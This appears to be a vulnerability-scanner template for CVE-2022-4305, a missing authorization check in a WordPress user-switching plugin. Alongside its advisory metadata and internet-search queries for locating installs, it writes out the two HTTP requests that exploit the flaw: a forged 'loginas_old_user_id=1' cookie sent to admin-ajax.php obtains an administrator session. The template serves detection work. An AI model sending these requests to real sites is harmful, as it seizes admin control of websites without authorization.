id: CVE-2022-4305 info: name: Login as User or Customer < 3.3 - Privilege Escalation author: r3Y3r53 severity: critical description: | The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session. impact: | Unauthenticated attackers can obtain valid admin sessions by exploiting missing authorization checks in the Login as User or Customer plugin, potentially gaining complete control over the WordPress site and all user accounts. remediation: | Fixed in version 3.3 reference: - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd - https://nvd.nist.gov/vuln/detail/CVE-2022-4305 - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 epss-score: 0.83054 epss-percentile: 0.99279 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: wp-buy product: login_as_user_or_customer_\(user_switching\) framework: wordpress shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user fofa-query: body=/wp-content/plugins/login-as-customer-or-user publicwww-query: /wp-content/plugins/login-as-customer-or-user tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln http: - raw: - | GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1 Host: {{Hostname}} Cookie: loginas_old_user_id=1 - | GET /wp-admin/users.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code_2 == 200 - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and # digest: 4a0a0047304502205c0166da6655f47517f105fcea8fc12592d91502d2f5564036b6e8a7ad0ccae4022100d14635bc8e47a785e25e8730e238dc10da212a945e7a4d29da3eae3e8dd11042:922c64590222798bb761d5b6d8e72950